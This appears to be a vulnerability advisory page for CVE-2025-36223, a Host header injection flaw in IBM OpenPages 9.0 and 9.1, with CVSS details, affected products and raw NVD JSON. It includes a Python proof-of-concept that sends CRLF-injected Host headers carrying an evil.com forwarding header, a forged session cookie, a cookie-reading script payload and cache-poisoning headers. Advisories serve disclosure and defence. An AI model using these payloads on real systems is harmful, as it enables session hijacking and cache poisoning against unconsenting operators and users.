Security Vulnerability Report
CVE-2025-36223 CVSS 5.4 MEDIUM

CVE-2025-36223

Published: 2025-11-12 21:15:50
Last Modified: 2025-11-18 19:14:29

Description

IBM OpenPages 9.0 and 9.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:* - VULNERABLE
IBM OpenPages 9.0
IBM OpenPages 9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36223 HTTP Header Injection PoC
# Target: IBM OpenPages 9.0/9.1
# Attack Type: HOST Header Injection leading to XSS/Cache Poisoning
import requests
from urllib.parse import quote

target_url = "http://target-ibm-openpages-server/"

# Malicious HOST header with CRLF injection for XSS
malicious_host = "example.com\r\nX-Forwarded-Host: evil.com\r\nSet-Cookie: session=stolen"

# Alternative: XSS payload via HOST header injection
xss_payload = "<script>alert(document.cookie)</script>"
malicious_host_xss = f"example.com\r\nX-Forwarded-Host: {xss_payload}"

# Cache poisoning payload
cache_poison_payload = "\r\nCache-Control: no-cache\r\nPragma: no-cache"
malicious_host_cache = f"example.com{cache_poison_payload}"


def test_header_injection(url, malicious_header):
    headers = {
        "Host": malicious_header,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    try:
        response = requests.get(url, headers=headers, timeout=10, verify=False)
        print(f"[+] Request sent to {url}")
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Headers:")
        for key, value in response.headers.items():
            print(f" {key}: {value}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


# Test the vulnerability
print("=" * 60)
print("CVE-2025-36223 - IBM OpenPages HTTP Header Injection Test")
print("=" * 60)

print("\n[1] Testing basic header injection...")
test_header_injection(target_url, malicious_host)

print("\n[2] Testing XSS via header injection...")
test_header_injection(target_url, malicious_host_xss)

print("\n[3] Testing cache poisoning...")
test_header_injection(target_url, malicious_host_cache)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36223", "sourceIdentifier": "[email protected]", "published": "2025-11-12T21:15:49.590", "lastModified": "2025-11-18T19:14:29.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM OpenPages 9.0 and 9.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-644"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8ACBB76-355D-43F6-851E-0B79EE52AC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F78E4CFE-31E7-4FFF-8DB4-6D7AC69A2248"}]}]}], "references": [{"url": 
"https://www.ibm.com/support/pages/node/7250239", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}